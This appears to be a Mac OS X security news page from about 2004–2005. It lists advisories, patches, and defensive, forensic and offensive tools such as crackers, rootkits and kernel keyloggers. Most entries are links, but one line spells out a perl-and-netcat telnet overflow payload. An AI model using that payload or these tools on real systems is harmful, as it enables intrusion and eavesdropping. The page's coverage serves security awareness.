Hardening Your Macintosh
os x security, auditing, hardening, pen-testing, privacy & more...
updated 4.23.04



previous "what's new":

-

6.24.05 -

A Tour of the Mac OS X Kernel by Amit Singh recently presented to the NSA (flash)

6.21.05 -

Terminal Sniffer Method Swizzling POC by David Blyth - Download POC

logKext v2.0a Released for Tiger - FSB Software - Download

HastalaDS_Store - Angelo Laub's mach_injector fun er hack - Overwrites the C function responsible for the creation of new files (FSCreateFileUnicode). - translated blog post
binary - source code

6.20.05 -

HenWen 2.12 Released - Download

6.17.05 -

Adobe Reader XML External Entity Attack - 7.0 & 7.0.1 vulnerable

6.16.05 -

Mezcal 1.0 Released - HTTP/HTTPS brute-forcing tool that allows the crafting of requests and insertion of dynamic variables on the fly.
Download

6.15.05 -

Java Web Start Untrusted Application/Applet Privilege Escalation - turn that darn Java OFF!

6.14.05 -

Mac OS X 10.4 launchd Race Condition Exploit by intropy (Computer Academic Underground)
CAU-launchd.c CAU-launchd-bf.sh

Mach_* 1.1 Released - Jonathan 'Wolf' Rentzsch
Download source package

6.09.05 -

Apple OSX multiple Bluetooth vulnerabilities discovered by Kevin Finisterre

Mac OS X 10.4 launchd race condition vulnerability discovered by Neil Archibald and Ilja Van Sprundel

Tunnelblick 2.0 Released for OS X 10.3 & 10.4 - "TunnelView" GUI for OpenVPN on the Mac - Previously OpenVPN-GUI

SourceForge WirelessDriver Beta 6 (for Tiger) Installer Package Released

6.08.05 -

Mac OS X Kernel Insecurities - Black Hat Briefings Europe 2005 presentation by Christian N. Klein & Ilja van Sprundel - The MacHackers (part of CCCBerlin). Information leaks, buffer overflows and Darwin security.

Security Update 2005-006 Released - Fixing numerous vulnerabilities.

6.07.05 -

Malicious Bundles on OS X - FSB Software

Mac OS X Hack & Crack fun pack 2005-04-18 - 356.12 MB of Mac hacking files, cracking, exploits, word lists, security tools, source code, binaries, shellcode, scripts and more. Package details
Download Torrent

6.02.05 -

QuickTime 7.0.1 Released - Apple fixes the QuickTime 7 information leakage.

5.28.05 -

ClamAV local privilege escalation vulnerability - Sentinel Chicken Networks

5.27.05 -

Forensic disk duplication modifies the evidence hard disk

5.26.05 -

Keynote 2.0.2 Released - Apple fixes security issues - Reported by David Remahl - POC

Computer Forensics and the ATA Interface - Commonly used disk imaging and wiping tools can be tricked to miss parts of a disk.

Apple Safari HTTPS Remote DoS vulnerability found by Gilbert Verdian - Safari 1.3 (v312) Exploit POC <- this will crash Safari

5.24.05 -

John 1.6.38 for MacOSX - Erik Winkler has John binaries. This version has all the patches from the openwall site applied plus some additional patches for raw SHA-1 hashes and Lotus v5 hashes.

FSLogger 1.0 beta - A File System Change Logger for "Tiger" from Amit Singh at kernelthread.com

CIS_OSX_Benchmark_v1.0.pdf released from the Center for Internet Security - OS X Benchmark Tool to be released very soon.

TTY Tickets - Close the sudo piggyback hole

5.20.05 -

Mac OS X 10.4.1 Update - Patches several new vulnerabilities in Tiger

5.19.05 -

Mac OSX 10.4.1 Dashboard Authentication Hijacking Vulnerability by Jonathan Zdziarski

5.17.05 -

Cert Technical Cyber Security Alert TA05-136A - Apple Mac OS X is affected by multiple vulnerabilities

Mac OS X - Adobe Version [C] version Exploit by ActionSpider - bugtraq archive

5.16.05 -

At Your Disservice - How ATA security functions jeopardize your data - c't magazine
Mac OS X kernel extension ATASecurity.kext - Download

5.15.05 -

I know what you downloaded from Freenet - Anonymous P2P network open to easy forensic attack

5.14.05 -

CLIX 1.6b Released - From Rixstep

Safari / Dashboard vulnerability in OS X 10.4 - Some more evil Dashboard possibilities from Aaron Harnly

Mac Worm X - News from Rixstep "This hasn't been done, but given the enormous help offered by Dashboard, it will be - and soon. This is how it will work."...

Paros v3.2 Released - for web application security assessment. A Java-based web proxy for testing the security of web applications. All HTTP and HTTPS data between server and client, including cookies and form fields, can be intercepted and modified.

Make It and Break It: Preventing Session Hijacking and Cookie Manipulation - Your Web Apps May Already Be at Risk

5.13.05 -

Quartz Composer / QuickTime 7 information leakage by David Remahl - POC

5.11.05 -

John the Ripper 1.6.38 Released - Now with official Altivec support. A significant number of code optimizations by Solar Designer of the altivec code improves performance quite a bit for DES and LM hashes under MacOS X.

5.10.05 -

Grokking Darwin ACLs

Apple iTunes MPEG4 Parsing Buffer Overflow Vulnerability by Mark Litchfield of NGS Software - Fixed in Apple iTunes 4.8

Malicious Widget Installation on MacFixIt - yesterday

5.08.05 -

Zaptastic - Blueprint for a widget of mass destruction ? Malicious Web Pages Can Install Dashboard Widgets

OS X 10.4 new-account wizard in Mail 2.0 sends clear-text passwords by Markus Wörle

5.06.05 -

4d WebSTAR 5.x Web Server Mac OS X Buffer Overflow with POC by Braden Thomas

Darwin Ports 1.0 released - 2500+ ports and counting.

5.05.05 -

Norton Anti-Virus having problems with identifying trojans - MacEnterprise List - NAV info

5.04.05 -

OS X vpnd Server_id Buffer Overflow Vulnerability by Jason Aras

5.03.05 -

OS X 10.3 Security Update 2005-005 - Fixing a whopping 20 bugs.

David Remahl's 4 security vulnerabilities in OS X addressed in the most recent Security Update.

OS X Server NeST - target Buffer Overflow Vulnerability by Nico

OS X multiple Bluetooth vulnerabilities by KF

5.02.05 -

OS X Default Pseudo-Terminal Permission Vulnerability - Matt Johnston - Bugtraq / Security Focus

Common Criteria Tools for 10.4 - Download

5.01.05 -

OS X Cocktail 3.5.4 admin password disclosure - Bugtraq

4.29.05 -

Bastille for OSX - tarball available - Package coming soon

Online Hash Crackers - plain-text.info - passcracking.com - Sarca Rainbow Tables - Dictionary Based Hash Cracker

4.28.05 -

HOWTO bypass Internet Censorship by Freerk

4.27.05 -

ADMmutate 0.8.4 by K2 - PPC version - A shellcode mutation engine that can evade NIDS.

Mac/Cowhand - A Proxy Trojan - Coverage via MacinTouch and Sophos - Actual infections?
Most likely a version of CowFight's UnderHand Proxy Server. Guide To Remove Underhand (v1.1)

4.25.05 -

HenWen 2.1.1 by Nick Zitzmann

Crack Me If You Can - some password hashes @ the deepquest.code511.com blog - CRACKED in a second or two!!

GPG Tools 1.2 Released

BrickHouse 1.3 by Brian Hill Released

4.22.05 -

Easy Mac Spoofing by Dust-X & FlacoAKAintruder - A set of scripts and some code to make Stefan Esser's Airport Extreme MAC spoofing even easier.
Download MacSpoofer

4.21.05 -

Protect Your Source Code: Obfuscation 101 by Matthew Russell

A Brief Tutorial on Reverse Engineering OS X by Rich Wareham

BypassIt by Nexus 9 - Rooting OSX With Physical Access via FireWire
Download BypassIt v 1.1

Spoofing the MAC address on Airport Extreme cards by Stefan Esser - Finally some MAC spoofing for AE cards via patching the binary driver.
Dynamic method - Static Method

MacKrack 1.5 Released - FSB Software - Version 1.5 adds support for Tiger password extraction, as well as Tiger Salted SHA-1 algorithm.
Download

4.20.05 -

Binary Protection on Mac OS X by Braden - Binary protection using UPX.

PEFTool v1.6 by FSB Software - This is a PEF binary disassembler in its early stages of development. It currently parses all PEF headers, fully disassembles (with many known bugs), and unmangles C++ symbols.
Download

4.19.05 -

APPLE-SA-2005-04-19 Security Update 2005-004 - Apple finally fixes the iSync vulnerability. It's always an incentive to get with it, when others fix your holes before you do.

The Mac OS X Expert Challenge - 2005.1 by Amit Singh

Network Forensics Evasion: How to Exit the Matrix by Ace Evader - A detailed look at staying anonymous on the Internet. OS X information is being updated.
"Need to surf anonymously? Willing to put forth the extra brainpower to prevent The Boss or The Man from watching what you do online? Or perhaps you live in the shadows, and would like to hack with confidence for once. No matter what the motivation, the age of truly anonymous Internet access has not yet ended. In fact, it may have just begun." from the Introduction.

The latest version of this document can be found at https://n4ez7vf37i2yvz5g.onion/howtos/ExitTheMatrix <-- you must use tor to access this - local Mirror

iSyncProtector by Dominik Fusina - A patch for the unfixed iSync exploit
Download

Apple OS X 10.3.9 System Update - Fixes numerous vulnerabilities.

4.17.05 -

OS X Machine Compromised - Precursor to OS X Zombies? - Early February 2005 - Intrusion found on client machine by technician.
Terminal history indicates that the machine was accessed and numerous toolkits downloaded to the machine. Most addresses point to free Romanian ftp and web hosting sites. Packages downloaded include: psyDarwin, an OS X-customized IRC connection bouncer; sshss, an ssh brute forcer/scanner (scripts and a Linux binary); and mechDarwin, an OS X-customized IRC bot. The bash_history indicates that the attacker knows little about the OS X operating system. The initial method used to compromise the machine is unknown.

AppleWebKit XMLHttpRequest arbitrary file disclosure vulnerability - David Remahl - Fixed in OS X 10.3.9 Update

4.16.05 -

MacKrack 1.43 Released - FSB Software - Fixes various bugs, adds performance stats, and increases speed of dmg cracking.
Download 1.43 - Wow 14,000+ downloads on MacUpdate!

4.6.05 -

PGP Desktop 9.0pb2 - New PGP beta available for testing.

OSX - Trojan apps can bypass authentication controls and gain root privileges - Advisory to bugtraq from bert@adbas.net
Download the POC

Check Failed Password Attempts - A simple gui to check secure.log logins and ssh logins.
Download v1.7

4.1.05 -

How to install and update the Checkmate tripwire - from afp548.com one of my daily sites

Bastille for OS X - working version coming very soon :)

3.30.05 -

Apple re-releases Security Update 2005-003 (Server) after fixes.

Absinthe is a gui-based tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection.
Download OS X v 1.3

telnet vuln is getting OS X machines hacked out there. Why run telnet?
perl -e 'print "\xff\xfd\x27\xff\xfa\x27\x01\x03","\x01"x"128","A"x"64","\xff\xf0"' | nc -lp 23

More virus contest follow-up.

3.26.05 -

OS X Virus contest - poof gone...

OS X Zombies in the wild - so not surprising.

3.22.05 -

"Apple has pulled Security Update 2005-003 (Server) 1.0 because of issues affecting Mac OS X Server's built-in Cyrus mail services. An updated version of the Security Update will be released in the very near future."

Symantec stirring the shit.

Mac OS X CF_CHARSET_PATH Buffer Overflow Vulnerability - iDefense & Anonymous

Apple Core Foundation "CF_CHARSET_PATH" Local Root Exploit by v9@fakehalo.us (fakehalo/realhalo)

New OSX Security Update 2005-003 is out - still no fix for iSink exploit and others...

ExploitTree is a categorized collection of ALL available exploit code, available via CVS. ExploitTree's ambition is to become the most organized, rich and up-to-date exploit repository on the internet.

2.15.05 -

Intrusion Detection with Snort/ACID on Mac OS X 10.3 - A Snort/ACID HOWTO for Mac OS X by Mark Duling

2.14.05 -

IDN Spoofing Defense for Safari in response to the Shmoo Group's release of a new domain spoofing exploit.

New GIAC paper by Cory Altheide - Poisoning the Apple: Exploiting the Apple File Server
An interesting paper that covers the AFP exploit process and possible attack and response.

Erik Winkler has updated his OS X John the Ripper distribution. Now supports all ciphers from 1.6.37 patches plus the new mscash cipher released by Simon Marechal (http://www.cr0.net:8040/misc/patch-john.html).
JTR 1.6.37 package

-

AppleFileServer (AFS) "FPLoginExt" Remote Denial of Service Exploit by nemo

-

Mac OS X "Finder/DS_Store" Arbitrary File Overwriting Exploit - by vade79

Mac OS X - Adobe Version Cue Local Root Exploit - a new POC by 0xdeadababe

-

Apple 'quicktime.qts' Error in Parsing 'qtif' Images Lets Remote Users Deny Service - discovered by ATmaCA
A demonstration exploit header is available at: http://www.atmacasoft.com/exp/vuln.qtif.zip

-

MacOS X at scheduling utilities privilege escalation - Bug found by Kevin Finisterre
DMA[2005-0127a]

Mac OS X 10.3 iSync "mRouter" Local Privilege Escalation Exploit - Bug found by Braden Thomas, exploit written by nemo.
fm-iSink.c

-

nemo has released some notes on Darwin Kernel Vulnerabilities and a kernel DoS exploit.
fm-nacho.txt

-

ImmunitySec released: Multiple Local Vulnerabilities in Mac OS X
pdf - open office

-

nemo has also written Term-inator - ptraces Terminal.app, stopping the system from being rebooted etc. A small DoS for OSX < 10.3.7

-

nemo has released a POC exploit for iTunes 4.3.7 on OS X 10.3.7. Shellcode binds a shell to port 4444.
Slashdot mirror

iDEFENSE Security Advisory 01.13.05 - Remote exploitation of a buffer overflow vulnerability in Apple Computer Inc.'s iTunes music player allows attackers to execute arbitrary code. The problem specifically exists when parsing playlist files that contain long URL file entries.

ATmaCA has released a remote Apple iTunes Playlist buffer overflow download shellcoded exploit. Versions up to 4.7 are affected. Tested with iTunes v4.7 on WinXP SP2 EN.

-

FSB Software has released an updated version of logKext v1.2 a kernel extension keylogger.

Mirror of Aaron Linville's complete dsniff package with Libnids, Libpcap and Libnet.

rumors of a new dsniff beta version soon...

-

Metasploit Framework 2.3 Released with 46 exploits and 68 payloads - Includes some new Mac OS X fun:

New size-optimized Mac OS X encoders and payloads
New OSX shellcodes
Samba trans2open() Buffer Overflow (Mac OS X)
4D WebSTAR FTP Server Buffer Overflow (Mac OS X)

download/

-

Angelo Laub's slides from his presentation "Mac OS X Insecurity" at the 21C3 congress.

Also his paper entitled Mac OS X Insecurity is available.

-


0.0.9.2 bundle with privoxy, tor and auto-startup - download
Mac OS X Documentation

-

Stack Smash Protector ( ProPolice ) for OpenDarwin 7.2.1 - Sam Hart has released a patch for ProPolice

Erik Winkler has posted John 1.6.37 source heavily optimized for MacOSX compilation. The binary included in the run directory has been compiled with IBM's xlc compiler and yielded a 20% speed boost over Apple's compiler for the LM hash cracking. See the README for more information.
download the 1.6.37 package

-

Priv8 Directory Service local root exploit - OS X 10.2.4
priv8osx.sh

-

Hackenslacker has three interesting articles:
GetCracking 10.3 - Covers obtaining hash files for Mac OS X 10.3.
Getting SUM - Covers booting into Single User Mode under Mac OS 10.x.
John.txt - Covers downloading and installing Apple's Developer Tools, and John the Ripper.

-

Paul Day's Network/performance/security tweaks for MacOSX.

Erik Winkler has again released some pumped up John the Ripper binaries. - download
This time the builds are optimized for Altivec and have numerous other patches from Solar Designer's site. Some benchmarks from the new patches.
We're still looking for G5 users to test the enclosed binaries, email Erik or me.

Altivec Benchmarking: Traditional DES [32/32 BS]... DONE Many salts: 663680 c/s real, 712103 c/s virtual Only one salt: 526668 c/s real, 544079 c/s virtual

For comparison, the MMX version on a 3 GHz P4 is:

Benchmarking: Traditional DES [64/64 BS MMX]... DONE Many salts: 758314 c/s Only one salt: 643683 c/s

-

Mac OS X / Adobe Version Cue local root exploit POC by Jonathan Bringhurst - local

-

Paul Day has released a detailed and concise paper and slides titled "Securing Mac OS X".

Paul also has another great writeup: Compiling a Mach/xnu kernel for MacOSX

New version of AirCrack 2.1 for OS X released: os x binaries - aircrack home

-

The new Ettercap NG 0.7.x is pretty darn cool, especially with the gtk interface. Install from source or via fink or darwinports

Also check out this script archive recently released to help out Enhancing Ettercap for Mac OS X (SSL!)

The Onion Router / torify HowTo wiki

-

Erik Winkler has compiled G4 & G5 optimized binaries of John the Ripper for MacOSX. Erik is looking for G5 users to test the enclosed binaries and sample LANMAN hash file pwdump_test.txt
In testing it took 36 seconds to crack all the hashes on a 12" 1.33 GHz PowerBook - test1 - test 2
Compiled versions are available for download

Johny Cache test 10.3.5 mac_kernel

Chroot ssh user account by Masaki Ogawa - English - Japanese

-

The U.S. National Security Agency (NSA) has released a 100 page guide to securing the OS X Operating System.
NSA download

-

Opener (Renepo) "a startup script to turn on services and gather user info & hashes for Mac OS X". The so-called "Virus", "Trojan", "Malware" - Opener version 2.3.8
Threads at MU Forums: dev discuss

JohnnyCache's kernel spoofing extension not working for wireless connections - kismac mailing list thread.

FSB Software has released logKext v 1.1 a kernel extension keylogger. Version 1.1 contains a command-line client that allows communication with the daemon, as well as strong logfile encryption. source

Maximillian Dornseif over at RedTeam has released some patches to compile various forensic tools on the mac:
dd_rescue-1.10-mac.patch - foremost-0.69-mac.patch - gpart-0.1h-mac.patch - md5deep-1.5-mac.patch
He's also done some work on getting socat working via darwinports - dports-dev

Derrick Donnelly, CTO, BlackBag Technologies presented a session entitled "Open Source Digital Forensic Acquisition and Analysis on Mac OS X" at the recent Oreilly Mac OS X Conference.
Download presentation pdf

-

nemo has released WeaponX, an OS X kernel extension rootkit that is roughly based on adore. It hides itself from kextstat, netstat, utmp and wtmp.
wX.tar.gz packetstorm mirror

Johny Cache has released a beta MAC spoofing kernel patch for the OS X/Darwin xnu kernel. It accomplishes this by rewriting MAC addresses on the fly in and out of the wire. It also forges pertinent ARP payloads and includes a patched ISC dhcp client that is aware of the shadowmac interface.
shadowmac.tar.gz - packetstorm mirror - freshmeat project home

Johny Cache has also released a distributed WEP cracker. It supports cracking arbitrary-sized keys, saving state, and has a pretty ncurses interface. If you have only one machine it will still run. Screenshots 1 & 2
jc-wepcrack.tar.gz - packetstorm mirror

-

Incoming malicious kernel extensions. Two beta OS X kernel extensions have been released:
FSB Software has released logKext a kernel extension keylogger.
Doss has released Togroot a beta kernel extension rootkit.

AirCrack 2.0 for OS X - Aircrack is an 802.11 WEP cracking program that can recover a 40-bit or 104-bit WEP key once enough encrypted packets have been gathered.
os x binaries - aircrack home

MacNessus 0.1 - K9 Productions has released a Mac OS X gui for the Nessus security scanner.
mnessus.dmg - source

The first ever OS X Root Kit is released by gapple - Has a lot of standard tools included, adds a TCP backdoor via inetd, does data recon, and more.
osxrk-0.2.1.tbz - local mirror

Encrypted Swap on Mac OS X 10.3 (Panther) - This method uses an encrypted disk image for the swap files. I have only started testing it and have yet to have any problems so far.
EncryptedSwap 0.2.1 (2004-08-05)

AppleFileServer LoginExt PathName Buffer Overflow - Vulnerability Advisory - Exploit payload for the Metasploit Framework - Works on unpatched 10.3.3 systems, unknown 10.3.0-2. Does not work on unpatched 10.2.8 systems. afp_loginext

Mac OS 10.3 Server Security by Charles Edge (krypted) - DefCon 12 presentation August 2004
OSX Server Security.ppt - .pdf version

A Corsaire White Paper: Securing Mac OS X by Stephen de Vries - June 2004 - A thorough new security & hardening paper. 040622-securing-mac-os-x.pdf